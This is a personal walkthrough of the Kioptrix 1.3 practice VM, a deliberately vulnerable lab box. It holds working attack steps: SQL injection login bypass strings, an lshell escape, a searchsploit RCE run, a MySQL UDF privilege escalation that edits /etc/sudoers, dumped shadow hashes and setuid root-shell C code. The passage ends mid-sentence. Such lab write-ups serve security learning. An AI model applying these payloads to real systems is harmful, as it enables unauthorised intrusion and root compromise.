Kioptrix 1.3
sudo netdiscover -i eth0
or if you prefer:
nmap -sn 192.168.1.1/24
resuling:
192.168.1.32 9e:86:37:32:02:d7 1 60 Unknown vendor
sudo nmap -sC -sV -O 192.168.1.32
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 10:58 EDT
Nmap scan report for 192.168.1.32
Host is up (0.0011s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 9E:86:37:32:02:D7 (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nikto reveals quite some vulnerabilities:
nikto -h 192.168.1.32 -p 80
-----------------------------------
+ Target IP: 192.168.1.32
+ Target Hostname: 192.168.1.32
+ Target Port: 80
+ Start Time: 2020-03-19 11:03:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears t
Among the reported vulnerabilities, of some relevance are:
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
Cookie PHPSESSID created without the httponly flag
So let’s try to access the web server on port 80:
http://http://192.168.1.32/
It is asking for a user and password.
F12 on he browser and we see that there is a form posting to a php file:
<form name="form1" method="post" action="checklogin.php"></form>
so it is a PHP application.
Let’s then try:
' or 1--
actually it is mysql database from the error message.
So let’s user our pastpartout for MySQL:
' or '1'='1
actually the output is escaped so there may be some protection there.
http://192.168.1.32/member.php?username=\%27%20or%20\%271\%27=\%271
In fact the output is:
User \' or \'1\'=\'1
Oups, something went wrong with your member's page account.
Please contact your local Administrator
to fix the issue.
So if I change now the field username to my name:
http://192.168.1.32/member.php?username=Max
my name is displayed on the page…
http://192.168.1.32/member.php?username=john
correlated with an error message. So I guess if I spot a name that is correct, then I may get a valid response, always providing as password:
' or '1'='1
So remembering the previous Kioptrix (1.2) a user was john, I give a try, and voilá, the user is actually john. I recognise though that is just a lucky guess and we need to proceed with a more methodological approach.
So let’s try to find out the list of directories on that website:
dirbuster -u http://192.168.1.32
We found out that there are two folders with name:
- john
- robert
and in fact we can see the password for the users, once logged in:
john: MyNameIsJohn
Interestingly, logging as robert I get back john’s page and password…
So let’s try to see if such a user and password can be used to get a shell:
ssh john@192.168.1.32
and yes we are in… so this is really a didactical box, I think this will never happen ireal life… but I notice we have a restricted shell…
john:~$ cd ..
*** forbidden path -> "/home/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
I followed the cheatsheet:
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://www.metahackers.pro/breakout-of-restricted-shell/
http://www.hackingmonks.net/2019/07/escaping-restricted-linux-shells-like.html
but nothing worked for me…
I should try: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
but not for now.
searchsploit openssh 4.7
Exploits: No Result
Shellcodes: No Result
Nothing really interesting about:
searchsploit apache 2.2
Nothing interesting…
going back to the restricted shell, I just learned that I can get the list of the allowed commands by typing:
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$ echo $SHELL
*** forbidden path -> "/bin/kshell"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
So let’s go to see which shell implements the commands:
- ll
- lpath
as they are not common commands.
We find out taht it is from:
https://sourceforge.net/p/lshell/wiki/Home/
I also tried randomly the command:
sudo
and I got back the below error:ß
john:~$ sudo
Traceback (most recent call last):
File "/bin/kshell", line 27, in <module>
lshell.main()
File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
cli.cmdloop()
So definitely this is the lshell…
Let’s go to see if there are associated vulnerabilities for that…
So I googled:
lshell how to bypass
and I get two interesting links:
- https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
I tried all of the suggestions but they did not really work.
So I try the second link:
- https://www.aldeid.com/wiki/Lshell
There there is not indication of a shell version so not sure it is useful but the suggested line is short so I give a try:
echo os.system('/bin/bash')
and actually it works… so I have full shell unrestricted capabilities… but I am not really satisfied, as not having a version of lshell to associate with the found vulnerability makes everything a bit too much heuristic, or well too much lucky that is not the case to rely on for a methodological approach… Said that I go to searchsploit and I look for something related to lshell there:
searchsploit lshell
and we get back:
LShell 0.9.15 - Remote Code Execution | exploits/linux/remote/39632.py
I try to run it but the script complains that I miss a library called: paramiko To fix this I run the command:
pip install paramiko
I try to rerun the command but it complains about sys.args so I add at the top the statement:
import sys
Now all looks correct and I am rady to issue:
python 39632.py john MyNameIsJohn 192.168.1.32 22
and it produces:
[!] .............................
[!] lshell <= 0.9.15 remote shell.
[!] note: you can also ssh in and execute '/bin/bash'
[!] .............................
[!] Checking host 192.168.1.32...
[+] vulnerable lshell found, preparing pseudo-shell...
Since it is a pseudoshell, the functionaity is not really friendly.
I could not really obtain a full tty but even if constrained by the shell hanging here and there, I had been able to spot:
$ ls -ltr /root
total 8
drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw-r--r-- 1 root root 625 2012-02-06 10:48 congrats.txt
Issuing the command:
less /root/congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
But I did not really got root so I’m missing the privilege escalation step…
We try to look for files owned by root that are writable by others:
find / -xdev -type f -user root -perm -o+wx
and we find: nothing :-/
Looking for files that are just writable:
find / -xdev -type f -user root -perm -o+w
and we find:
-rw-rw-rw- 1 root root 12896 2012-02-04 10:08 /usr/lib/lib_mysqludf_sys.so
I find really bizare that the library has rw access for others, this looks like someone was already here doing some hacking and left us this present…
I go to google for:
ib_mysqludf_sys.so mysql exploit
and I get back this interesting link:
https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md
In the article it mentions that it may be possible to get root privileges if one has mysql root access…
So we need to see if we have any authentication enabled for root. Looking at:
/var/www/checklogin.php
we discover that mysql may have authentication for root with an empty password:
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
So we try:
mysql -u root -p mysql
and yes we are in:
mysql>
Reading further int he document:
https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md
Here the document section of our interest:
mysql -u root
use mysql;
create table hack(line blob);
insert into hack values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from hack into dumpfile '/usr/lib/lib_mysqludf_sys.so';
create function sys_exec returns some integer soname'lib_mysqludf_sys.so';
In the article we find a reference to:
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
and fro there I do a git clone:
git clone https://github.com/mysqludf/lib_mysqludf_sys
And we get the files:
122 Mar 21 09:40 Makefile
1647 Mar 21 09:40 lib_mysqludf_sys.sql
12896 Mar 21 09:40 lib_mysqludf_sys.so
9934 Mar 21 09:40 lib_mysqludf_sys.html
Mar 21 09:40 lib_mysqludf_sys.c
1544 Mar 21 09:40 install.sh
We note that the file from git:
12896 Mar 21 09:40 lib_mysqludf_sys.so
has the same size of the file in the victim system:
-rw-rw-rw- 1 root root 12896 2012-02-04 10:08 /usr/lib/lib_mysqludf_sys.so
and not only that… also the same sum:
sum /usr/lib/lib_mysqludf_sys.so
35117 13
tamosma@kali:~/hck-exercise/kioptrix-1.3/lib_mysqludf_sys$ sum lib_mysqludf_sys.so
35117 13
From the above article we need to fix the sys_exec function to:
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
as we had a look from:
lib_mysqludf_sys.sql
Test function:
select sys_exec('id >/tmp/out; chown user:user /tmp/out');
quit
cat /tmp/out
and in fact the output of:
cat /tmp/out
is:
uid=0(root) gid=0(root)
so that is a great achievement, ins’t it?
Now we want to add john to the sudoers, plus get a full root shell.
Add john to sudoers
select sys_exec(‘echo “john ALL=(ALL) ALL” » /etc/sudoers’);
Let’s try it:
sudo cat /etc/shadow
and voilá:
...
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::
Add full root shell
We use the code:
int main(){
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
and we compile it into our kali linux. Since it is a basic c code, it should run pretty anywhere once compiled:
gcc -m32 -o escalate2root escalate2root.c
We transfer the file to the victim phrough python HTTPServer:
python -m SimpleHTTPServer 1050
then we give him the setuid bit of root:
mysql> select sys_exec('chmod +s /home/john/escalate2root');
and the result is cool:
-rwsr-sr-x 1 root root 15536 2020-03-21 10:26 escalate2root
john@Kioptrix4:~$ ./escalate2root
# id
uid=1001(john) gid=1001(john) euid=0(root) egid=0(root) groups=27(sudo),1001(john)
#
I then found a guide that exploitet a weakness on the member.php page to get the list of users and also it followed the same exploitation way for teh mysql even if with slightly small differences on the findings of the vulnerabilities. I think is worth reporting it: